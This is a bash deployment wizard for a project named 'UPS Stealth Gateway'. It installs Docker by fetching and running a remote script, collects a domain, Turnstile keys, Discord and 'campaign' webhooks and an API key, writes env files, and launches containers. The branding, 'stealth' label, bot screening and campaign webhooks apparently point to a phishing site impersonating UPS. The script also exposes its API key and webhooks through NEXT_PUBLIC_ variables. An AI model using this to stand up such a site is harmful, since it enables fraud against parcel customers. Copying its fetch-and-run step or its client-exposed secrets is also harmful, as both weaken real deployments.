#!/bin/bash

# Deployment Wizard for UPS Stealth Gateway
# ----------------------------------------------------

# Colors
GREEN='\033[0;32m'
NC='\033[0m' # No Color

echo -e "${GREEN}=== Automatic Deployment Wizard ===${NC}"
echo "This script will verify requirements, configure the environment, and launch the stack."
echo ""

# 1. Check Requirements & Install Docker
echo -e "${GREEN}[1/5] Checking System Requirements...${NC}"

if ! [ -x "$(command -v docker)" ]; then
  echo "Docker is not installed. Installing automatically..."
  
  # Official Docker Convenience Script
  curl -fsSL https://get.docker.com -o get-docker.sh
  sh get-docker.sh
  rm get-docker.sh
  
  echo "Docker installed successfully."
else
  echo "Docker is already installed."
fi

# Ensure current user is in docker group (to avoid sudo requirement for future sessions)
# Note: This script typically runs as root (sudo) on VPS, so this might be redundant but good practice.
# If running as non-root, this enables non-sudo docker commands.
if ! groups $USER | grep &>/dev/null '\bdocker\b'; then
    echo "Adding user to docker group..."
    sudo usermod -aG docker $USER || true
fi

# 2. Check Components & Versions
echo -e "${GREEN}[2/5] Verifying Installation...${NC}"
DOCKER_VERSION=$(docker --version)
echo "Docker: $DOCKER_VERSION"

# Check for Docker Compose (Plugin or Standalone)
if docker compose version >/dev/null 2>&1; then
    COMPOSE_VERSION=$(docker compose version)
    echo "Compose (Plugin): $COMPOSE_VERSION"
elif docker-compose version >/dev/null 2>&1; then
    COMPOSE_VERSION=$(docker-compose version)
    echo "Compose (Standalone): $COMPOSE_VERSION"
else
    echo "Error: Docker Compose not found."
    echo "Attempting to install docker-compose-plugin..."
    sudo apt-get update && sudo apt-get install -y docker-compose-plugin
    
    if ! docker compose version >/dev/null 2>&1; then
        echo "Failed to install Docker Compose. Please install manually."
        exit 1
    fi
    echo "Compose Installed: $(docker compose version)"
fi

# 3. Gather Information
echo -e "${GREEN}[3/5] Configuration${NC}"

# Domain
read -p "Enter your Domain Name (e.g., secure-check.com): " DOMAIN_NAME
if [ -z "$DOMAIN_NAME" ]; then echo "Domain is required."; exit 1; fi

# Email for SSL
read -p "Enter Email for SSL (Let's Encrypt): " ACME_EMAIL
if [ -z "$ACME_EMAIL" ]; then echo "Email is required."; exit 1; fi

# Turnstile Keys
echo ""
echo "--- Cloudflare Turnstile Keys ---"
read -p "Enter Site Key: " TURNSTILE_SITE_KEY
read -p "Enter Secret Key: " TURNSTILE_SECRET_KEY

# Webhooks
echo ""
echo "--- Integrations (Optional - Press Enter to skip) ---"
read -p "Discord Webhook URL: " DISCORD_WEBHOOK
read -p "Supabase DB Webhook URL: " DB_WEBHOOK
read -p "Campaign Webhook URL: " CAMPAIGN_WEBHOOK
read -p "Campaign API Key: " CAMPAIGN_KEY

# 4. Create Environment Files
echo -e "${GREEN}[4/5] Generating Configuration Files...${NC}"

# Create .env.production for the App Container
cat > .env.production <<EOL
# Generated by deploy.sh
NEXT_PUBLIC_TURNSTILE_SITE_KEY=$TURNSTILE_SITE_KEY
TURNSTILE_SECRET_KEY=$TURNSTILE_SECRET_KEY

NEXT_PUBLIC_DISCORD_WEBHOOK_URL=$DISCORD_WEBHOOK
NEXT_PUBLIC_DB_WEBHOOK_URL=$DB_WEBHOOK
NEXT_PUBLIC_CAMPAIGN_WEBHOOK_URL=$CAMPAIGN_WEBHOOK
NEXT_PUBLIC_CAMPAIGN_API_KEY=$CAMPAIGN_KEY
EOL

# Create .env for Docker Compose (Traefik var expansion AND Build Args)
cat > .env <<EOL
DOMAIN_NAME=$DOMAIN_NAME
ACME_EMAIL=$ACME_EMAIL

# Build Args for Next.js Inlining
NEXT_PUBLIC_TURNSTILE_SITE_KEY=$TURNSTILE_SITE_KEY
NEXT_PUBLIC_DISCORD_WEBHOOK_URL=$DISCORD_WEBHOOK
NEXT_PUBLIC_DB_WEBHOOK_URL=$DB_WEBHOOK
NEXT_PUBLIC_CAMPAIGN_WEBHOOK_URL=$CAMPAIGN_WEBHOOK
NEXT_PUBLIC_CAMPAIGN_API_KEY=$CAMPAIGN_KEY
EOL

echo "Configuration saved."

# 5. Launch
echo -e "${GREEN}[5/5] Launching Containers...${NC}"
echo "Building and starting services..."

# Use modern 'docker compose' or legacy 'docker-compose'
if docker compose version >/dev/null 2>&1; then
    docker compose up -d --build
else
    docker-compose up -d --build
fi

echo ""
echo -e "${GREEN}=== Deployment Complete! ===${NC}"
echo "Your site should be live at: https://$DOMAIN_NAME"
echo "SSL certificates will be generated automatically within a few seconds."
